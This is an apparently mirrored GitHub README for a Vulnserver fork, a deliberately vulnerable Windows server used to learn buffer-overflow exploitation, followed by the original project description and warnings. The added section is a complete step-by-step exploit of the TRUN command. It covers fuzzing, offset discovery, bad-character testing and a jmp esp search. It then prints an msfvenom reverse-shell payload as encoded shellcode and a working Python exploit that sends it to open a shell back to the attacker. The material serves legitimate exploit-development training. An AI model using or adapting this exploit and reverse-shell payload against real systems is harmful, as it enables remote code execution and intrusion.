Giter VIP home page Giter VIP logo

vulnserver's Introduction

Exploit steps

1. Spiking

2. Fuzzing

3. Finding The Offset

4. Overwriting The EIP

5. Finding Bad characters

6. Finding the Right Module

7. Generating ShellCode

8. Got Shell

http://thegreycorner.com/vulnserver.html

http://thegreycorner.com/tags.html#vulnserver

Vulnerable help

Kali
172.16.242.128

Windows10
172.16.242.133

root@kali:~# nc 172.16.242.133 9999
Welcome to Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

EIP 41414141

vi 0-TRUN.spk

s_readline();
s_string("TRUN ");
s_string_variable("0");

generic_send_tcp -h

root@kali:~# generic_send_tcp -h
argc=2
Usage: ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
./generic_send_tcp 192.168.1.100 701 something.spk 0 0

root@kali:~/shellcode# generic_send_tcp 172.16.242.133 9999 0-TRUN.spk 0 0
Total Number of Strings is 681
Fuzzing
Fuzzing Variable 0:0
line read=Welcome to Vulnerable Server! Enter HELP for help.
Fuzzing Variable 0:1
Variablesize= 5004
Fuzzing Variable 0:2
Variablesize= 5005
Fuzzing Variable 0:3
Variablesize= 21
Fuzzing Variable 0:4
Variablesize= 3
Fuzzing Variable 0:5
Variablesize= 2
Fuzzing Variable 0:6

pattern_create.rb

root@kali:cd /usr/share/metasploit-framework/tools/exploit

root@kali:/usr/share/metasploit-framework/tools/exploit# ll
total 128
-rwxr-xr-x 1 root root  5466 May  6 10:21 egghunter.rb
-rwxr-xr-x 1 root root  1008 May  6 10:21 exe2vba.rb
-rwxr-xr-x 1 root root   944 May  6 10:21 exe2vbs.rb
-rw-r--r-- 1 root root   827 Apr 30 10:32 extract_msu.bat
-rwxr-xr-x 1 root root  4135 May  6 10:21 find_badchars.rb
-rwxr-xr-x 1 root root   886 Apr 30 10:32 install_msf_apk.sh
-rwxr-xr-x 1 root root  4853 May  6 10:21 java_deserializer.rb
-rwxr-xr-x 1 root root  3006 May  6 10:21 jsobfu.rb
-rwxr-xr-x 1 root root  4975 May  6 10:21 metasm_shell.rb
-rwxr-xr-x 1 root root   620 May  6 10:21 msf_irb_shell.rb
-rwxr-xr-x 1 root root  3133 May  6 10:21 msu_finder.rb
-rwxr-xr-x 1 root root  1483 May  6 10:21 nasm_shell.rb
-rwxr-xr-x 1 root root  2165 May  6 10:21 pattern_create.rb
-rwxr-xr-x 1 root root  4397 May  6 10:21 pattern_offset.rb
-rwxr-xr-x 1 root root   891 May  6 10:21 pdf2xdp.rb
-rwxr-xr-x 1 root root  6496 May  6 10:21 psexec.rb
-rwxr-xr-x 1 root root  1091 May  6 10:21 random_compile_c.rb
-rwxr-xr-x 1 root root 18312 May  6 10:21 reg.rb
-rwxr-xr-x 1 root root 13918 May  6 10:21 virustotal.rb
root@kali:/usr/share/metasploit-framework/tools/exploit#

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -h
Usage: msf-pattern_create [options]
Example: msf-pattern_create -l 50 -s ABC,def,123
Ad1Ad2Ad3Ae1Ae2Ae3Af1Af2Af3Bd1Bd2Bd3Be1Be2Be3Bf1Bf

Options:
    -l, --length <length>            The length of the pattern
    -s, --sets <ABC,def,123>         Custom Pattern Sets
    -h, --help                       Show this message
root@kali:/usr/share/metasploit-framework/tools/exploit#

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 2200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C
root@kali:/usr/share/metasploit-framework/tools/exploit#

EIP 386F4337

#!/usr/bin/python
import socket

buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(("172.16.242.133",9999))
s.send(('TRUN /.:/' + buffer))



root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -h
Usage: msf-pattern_offset [options]
Example: msf-pattern_offset -q Aa3A
[*] Exact match at offset 9

Options:
    -q, --query Aa0A                 Query to Locate
    -l, --length <length>            The length of the pattern
    -s, --sets <ABC,def,123>         Custom Pattern Sets
    -h, --help                       Show this message
root@kali:/usr/share/metasploit-framework/tools/exploit#

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -l 2200 -q 386F4337
[*] Exact match at offset 2003
root@kali:/usr/share/metasploit-framework/tools/exploit#

EIP 42424242

#!/usr/bin/python
import socket

buffer = "A" * 2003 + "B" * 4
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(("172.16.242.133",9999))
s.send(('TRUN /.:/' + buffer))

badchars

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

!mona modules

https://github.com/corelan/mona

C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands\mona.py

[essfunc.dll] (C:\Users\Jas502n\Desktop\vulnserver\essfunc.dll)
[vulnserver.exe] (C:\Users\Jas502n\Desktop\vulnserver\vulnserver.exe)

jmp esp \xff\xe4

C:\Users\Jas502n\Desktop\vulnserver\essfunc.dll

!mona find -s "\xff\xe4" -m essfunc.dll

625011AF     0x625011af : "\xff\xe4" \xaf\x11\x50\x62
625011BB     0x625011bb : "\xff\xe4" \xbb\x11\x50\x62
625011C7     0x625011c7 : "\xff\xe4" \xc7\x11\x50\x62
625011D3     0x625011d3 : "\xff\xe4" \xd3\x11\x50\x62
625011DF     0x625011df : "\xff\xe4" \xdf\x11\x50\x62
625011EB     0x625011eb : "\xff\xe4" \xeb\x11\x50\x62
625011F7     0x625011f7 : "\xff\xe4" \xf7\x11\x50\x62
62501203     0x62501203 : "\xff\xe4" \x03\x12\x50\x62
62501205     0x62501205 : "\xff\xe4" \xc5\x12\x50\x62

shellcode.c

root@kali:~/shellcode# msfvenom -p windows/shell_reverse_tcp lhost=172.16.242.128 lport=6666 EXITFUNC=thread -f c -a x86 --platform windows -b "\x00" -v shellcode -f c > shellcode.c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes

root@kali:~/shellcode# cat shellcode.c
unsigned char shellcode[] =
"\xdb\xc1\xd9\x74\x24\xf4\xb8\xdf\x41\x71\x0b\x5d\x29\xc9\xb1"
"\x52\x83\xed\xfc\x31\x45\x13\x03\x9a\x52\x93\xfe\xd8\xbd\xd1"
"\x01\x20\x3e\xb6\x88\xc5\x0f\xf6\xef\x8e\x20\xc6\x64\xc2\xcc"
"\xad\x29\xf6\x47\xc3\xe5\xf9\xe0\x6e\xd0\x34\xf0\xc3\x20\x57"
"\x72\x1e\x75\xb7\x4b\xd1\x88\xb6\x8c\x0c\x60\xea\x45\x5a\xd7"
"\x1a\xe1\x16\xe4\x91\xb9\xb7\x6c\x46\x09\xb9\x5d\xd9\x01\xe0"
"\x7d\xd8\xc6\x98\x37\xc2\x0b\xa4\x8e\x79\xff\x52\x11\xab\x31"
"\x9a\xbe\x92\xfd\x69\xbe\xd3\x3a\x92\xb5\x2d\x39\x2f\xce\xea"
"\x43\xeb\x5b\xe8\xe4\x78\xfb\xd4\x15\xac\x9a\x9f\x1a\x19\xe8"
"\xc7\x3e\x9c\x3d\x7c\x3a\x15\xc0\x52\xca\x6d\xe7\x76\x96\x36"
"\x86\x2f\x72\x98\xb7\x2f\xdd\x45\x12\x24\xf0\x92\x2f\x67\x9d"
"\x57\x02\x97\x5d\xf0\x15\xe4\x6f\x5f\x8e\x62\xdc\x28\x08\x75"
"\x23\x03\xec\xe9\xda\xac\x0d\x20\x19\xf8\x5d\x5a\x88\x81\x35"
"\x9a\x35\x54\x99\xca\x99\x07\x5a\xba\x59\xf8\x32\xd0\x55\x27"
"\x22\xdb\xbf\x40\xc9\x26\x28\xc3\x1e\xda\x28\x73\x1d\x1a\x33"
"\x8e\xa8\xfc\x29\x9e\xfc\x57\xc6\x07\xa5\x23\x77\xc7\x73\x4e"
"\xb7\x43\x70\xaf\x76\xa4\xfd\xa3\xef\x44\x48\x99\xa6\x5b\x66"
"\xb5\x25\xc9\xed\x45\x23\xf2\xb9\x12\x64\xc4\xb3\xf6\x98\x7f"
"\x6a\xe4\x60\x19\x55\xac\xbe\xda\x58\x2d\x32\x66\x7f\x3d\x8a"
"\x67\x3b\x69\x42\x3e\x95\xc7\x24\xe8\x57\xb1\xfe\x47\x3e\x55"
"\x86\xab\x81\x23\x87\xe1\x77\xcb\x36\x5c\xce\xf4\xf7\x08\xc6"
"\x8d\xe5\xa8\x29\x44\xae\xc9\xcb\x4c\xdb\x61\x52\x05\x66\xec"
"\x65\xf0\xa5\x09\xe6\xf0\x55\xee\xf6\x71\x53\xaa\xb0\x6a\x29"
"\xa3\x54\x8c\x9e\xc4\x7c";
root@kali:~/shellcode#

exploit.py

#!/usr/bin/python
# -*- coding: UTF-8 -*-
import socket

shellcode =(
"\xdb\xc1\xd9\x74\x24\xf4\xb8\xdf\x41\x71\x0b\x5d\x29\xc9\xb1"
"\x52\x83\xed\xfc\x31\x45\x13\x03\x9a\x52\x93\xfe\xd8\xbd\xd1"
"\x01\x20\x3e\xb6\x88\xc5\x0f\xf6\xef\x8e\x20\xc6\x64\xc2\xcc"
"\xad\x29\xf6\x47\xc3\xe5\xf9\xe0\x6e\xd0\x34\xf0\xc3\x20\x57"
"\x72\x1e\x75\xb7\x4b\xd1\x88\xb6\x8c\x0c\x60\xea\x45\x5a\xd7"
"\x1a\xe1\x16\xe4\x91\xb9\xb7\x6c\x46\x09\xb9\x5d\xd9\x01\xe0"
"\x7d\xd8\xc6\x98\x37\xc2\x0b\xa4\x8e\x79\xff\x52\x11\xab\x31"
"\x9a\xbe\x92\xfd\x69\xbe\xd3\x3a\x92\xb5\x2d\x39\x2f\xce\xea"
"\x43\xeb\x5b\xe8\xe4\x78\xfb\xd4\x15\xac\x9a\x9f\x1a\x19\xe8"
"\xc7\x3e\x9c\x3d\x7c\x3a\x15\xc0\x52\xca\x6d\xe7\x76\x96\x36"
"\x86\x2f\x72\x98\xb7\x2f\xdd\x45\x12\x24\xf0\x92\x2f\x67\x9d"
"\x57\x02\x97\x5d\xf0\x15\xe4\x6f\x5f\x8e\x62\xdc\x28\x08\x75"
"\x23\x03\xec\xe9\xda\xac\x0d\x20\x19\xf8\x5d\x5a\x88\x81\x35"
"\x9a\x35\x54\x99\xca\x99\x07\x5a\xba\x59\xf8\x32\xd0\x55\x27"
"\x22\xdb\xbf\x40\xc9\x26\x28\xc3\x1e\xda\x28\x73\x1d\x1a\x33"
"\x8e\xa8\xfc\x29\x9e\xfc\x57\xc6\x07\xa5\x23\x77\xc7\x73\x4e"
"\xb7\x43\x70\xaf\x76\xa4\xfd\xa3\xef\x44\x48\x99\xa6\x5b\x66"
"\xb5\x25\xc9\xed\x45\x23\xf2\xb9\x12\x64\xc4\xb3\xf6\x98\x7f"
"\x6a\xe4\x60\x19\x55\xac\xbe\xda\x58\x2d\x32\x66\x7f\x3d\x8a"
"\x67\x3b\x69\x42\x3e\x95\xc7\x24\xe8\x57\xb1\xfe\x47\x3e\x55"
"\x86\xab\x81\x23\x87\xe1\x77\xcb\x36\x5c\xce\xf4\xf7\x08\xc6"
"\x8d\xe5\xa8\x29\x44\xae\xc9\xcb\x4c\xdb\x61\x52\x05\x66\xec"
"\x65\xf0\xa5\x09\xe6\xf0\x55\xee\xf6\x71\x53\xaa\xb0\x6a\x29"
"\xa3\x54\x8c\x9e\xc4\x7c"
)

buffer = "A" * 2003 + "\xaf\x11\x50\x62"  + '\x90' * 32 + shellcode
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(("172.16.242.133",9999))
s.send(('TRUN /.:/' + buffer))
s.close()

Vulnserver

Check my blog at http://thegreycorner.com/ for more information and updates to this software.

About the software

Vulnserver is a multithreaded Windows based TCP server that listens for client connections on port 9999 (by default) and allows the user to run a number of different commands that are vulnerable to various types of exploitable buffer overflows.

This software is intended mainly as a tool for learning how to find and exploit buffer overflow bugs, and each of the bugs it contains is subtly different from the others, requiring a slightly different approach to be taken when writing the exploit.

Though it does make an attempt to mimic a (simple) legitimate server program this software has no functional use beyond that of acting as an exploit target, and this software should not generally be run by anyone who is not using it as a learning tool.

Compiling the software

Binaries have been provided in this package, however if you wish to compile the software from the provided source files instructions are included in the file COMPILING.txt.

Running the software

To run the software, simply execute vulnserver.exe. The provided essfunc.dll library must be in a location where it can be found by vulnserver.exe - keeping both files in the same directory will usually work fine.

To start the server listening on the default port of 9999, simply run the executable, to use an alternate port, provide the port number as a command line parameter.

Once the software is running, simply connect to it on port 9999 using a command line client like netcat. Issue a HELP command (case sensitive) to see what functions are supported and go from there....

Exploiting Vulnserver

Detailed instructions on how to exploit this software, or example exploit files have not been included with this package - this is to provide a challenge for those who want it and also a disincentive to cheat by peeking at the answer.

If you're stuck, you can refer to the following to get an idea of how to proceed. Some of the following links provide full tutorials that teach the skills necessary to exploit and discover the vulnerabilities in Vulnserver, along with complete walkthroughs for some of the simpler vulnerabilities. In the case of the more difficult issues, some of the links might provide just a hint of how you can proceed...

License

See LICENSE.txt.

Warning

UNDER NO CIRCUMSTANCES SHOULD THIS SOFTWARE BE RUN ON ANY SYSTEM THAT IS CONNECTED TO AN UNTRUSTED NETWORK OR THAT PERFORMS CRITICAL FUNCTIONS. THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGES THAT MAY OCCUR FROM USING THIS SOFTWARE IN THIS OR ANY OTHER MANNER. USE AT YOUR OWN RISK.

vulnserver's People

Contributors

jas502n avatar stephenbradshaw avatar

Stargazers

avatar avatar

Forkers

thanhuutuan

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.